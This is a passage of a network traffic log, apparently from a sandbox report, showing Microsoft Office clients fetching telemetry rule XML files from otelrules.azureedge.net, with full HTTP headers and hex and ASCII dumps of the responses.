N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke

Session ID	Source IP	Source Port	Destination IP	Destination Port
135	192.168.2.7	49863	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 12:00:15 UTC	192	OUT	GET /rules/rule700500v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 12:00:16 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 12:00:16 GMT Content-Type: text/xml Content-Length: 1368 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT ETag: "0x8DC582BE51CE7B3" x-ms-request-id: 1e99177e-901e-0029-5406-48274a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T120016Z-r1cf579d778xq4f9hC1EWRx41g0000000240000000002f2k x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 12:00:16 UTC	1368	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 6f 77 65 72 50 6f 69 6e 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" /> <F T=

Session ID	Source IP	Source Port	Destination IP	Destination Port
136	192.168.2.7	49864	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 12:00:15 UTC	192	OUT	GET /rules/rule702551v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 12:00:16 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 12:00:16 GMT Content-Type: text/xml Content-Length: 1415 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT ETag: "0x8DC582BDCE9703A" x-ms-request-id: 8337024b-c01e-0079-5d05-48e51a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T120016Z-r1cf579d778lntp7hC1EWR9gg400000001rg000000002add x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 12:00:16 UTC	1415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan

Session ID	Source IP	Source Port	Destination IP	Destination Port
137	192.168.2.7	49865	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 12:00:17 UTC	192	OUT	GET /rules/rule702550v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 12:00:18 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 12:00:18 GMT Content-Type: text/xml Content-Length: 1378 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT ETag: "0x8DC582BE584C214" x-ms-request-id: 40072cf2-b01e-001e-4a03-480214000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T120018Z-r1cf579d7788pwqzhC1EWRrpd800000002g0000000003g37 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 12:00:18 UTC	1378	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702550" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPersonalization" S="Medium" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
138	192.168.2.7	49866	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 12:00:17 UTC	192	OUT	GET /rules/rule701351v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 12:00:18 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 12:00:18 GMT Content-Type: text/xml Content-Length: 1407 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT ETag: "0x8DC582BE687B46A" x-ms-request-id: f1085035-901e-007b-3808-48ac50000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T120018Z-r1cf579d77898tqwhC1EWRf9q8000000027g000000004cxx x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 12:00:18 UTC	1407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok

Session ID	Source IP	Source Port	Destination IP	Destination Port
139	192.168.2.7	49867	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 12:00:17 UTC	192	OUT	GET /rules/rule701350v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 12:00:18 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 12:00:18 GMT Content-Type: text/xml Content-Length: 1370 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT ETag: "0x8DC582BDE62E0AB" x-ms-request-id: a36eb884-e01e-0051-4c04-4884b2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T120018Z-r1cf579d778xq4f9hC1EWRx41g00000002000000000050b2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 12:00:18 UTC	1370	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPerformance" S="Medium" /> <F

Session ID	Source IP	Source Port	Destination IP	Destination Port
140	192.168.2.7	49868	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 12:00:17 UTC	192	OUT	GET /rules/rule702151v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 12:00:18 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 12:00:18 GMT Content-Type: text/xml Content-Length: 1397 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE156D2EE" x-ms-request-id: 447ddde3-501e-0047-290a-48ce6c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T120018Z-r1cf579d778v97q7hC1EWRf95c00000001tg000000003yrt x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 12:00:18 UTC	1397	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeo

Session ID	Source IP	Source Port	Destination IP	Destination Port
141	192.168.2.7	49869	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 12:00:18 UTC	192	OUT	GET /rules/rule702150v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 12:00:18 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 12:00:18 GMT Content-Type: text/xml Content-Length: 1360 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:07 GMT ETag: "0x8DC582BEDC8193E" x-ms-request-id: 848b85bb-b01e-0053-2106-48cdf8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T120018Z-r1cf579d778dfdgnhC1EWRd3w0000000020g000000003ufd x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 12:00:18 UTC	1360	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f 70 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeople" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
142	192.168.2.7	49870	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 12:00:20 UTC	192	OUT	GET /rules/rule703001v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 12:00:20 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 12:00:20 GMT Content-Type: text/xml Content-Length: 1406 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT ETag: "0x8DC582BEB16F27E" x-ms-request-id: 1c840c04-c01e-0034-5806-482af6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T120020Z-r1cf579d778qgtz2hC1EWRmgks000000024g000000001ym3 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 12:00:20 UTC	1406	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703001" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok

Session ID	Source IP	Source Port	Destination IP	Destination Port
143	192.168.2.7	49871	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 12:00:20 UTC	192	OUT	GET /rules/rule703000v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 12:00:20 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 12:00:20 GMT Content-Type: text/xml Content-Length: 1369 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT ETag: "0x8DC582BE32FE1A2" x-ms-request-id: 5fa529d3-701e-0097-6308-48b8c1000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T120020Z-r1cf579d778d5zkmhC1EWRk6h800000002tg000000001fc1 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 12:00:20 UTC	1369	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 4d 61 63 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703000" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookMac" S="Medium" /> <F T

Session ID	Source IP	Source Port	Destination IP	Destination Port
144	192.168.2.7	49872	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 12:00:20 UTC	192	OUT	GET /rules/rule700751v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 12:00:20 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 12:00:20 GMT Content-Type: text/xml Content-Length: 1414 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BE03B051D" x-ms-request-id: 0c26b312-d01e-0049-6f07-48e7dc000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T120020Z-r1cf579d7786c2tshC1EWRr1gc00000001xg000000002sse x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 12:00:20 UTC	1414	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan

Session ID	Source IP	Source Port	Destination IP	Destination Port
145	192.168.2.7	49873	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 12:00:20 UTC	192	OUT	GET /rules/rule700750v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 12:00:20 UTC	515	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 12:00:20 GMT Content-Type: text/xml Content-Length: 1377 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:02 GMT ETag: "0x8DC582BEAFF0125" x-ms-request-id: 217a7818-401e-00ac-3104-480a97000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T120020Z-r1cf579d778bb9vvhC1EWRs95400000001u0000000003n06 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-12-07 12:00:20 UTC	1377	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 44 65 73 6b 74 6f 70 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookDesktop" S="Medium" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
146	192.168.2.7	49874	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 12:00:20 UTC	192	OUT	GET /rules/rule700151v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 12:00:20 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 12:00:20 GMT Content-Type: text/xml Content-Length: 1399 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT ETag: "0x8DC582BE0A2434F" x-ms-request-id: b8fa7c57-101e-008e-1803-48cf88000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T120020Z-r1cf579d778mvsklhC1EWRkavg00000002mg0000000016ch x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
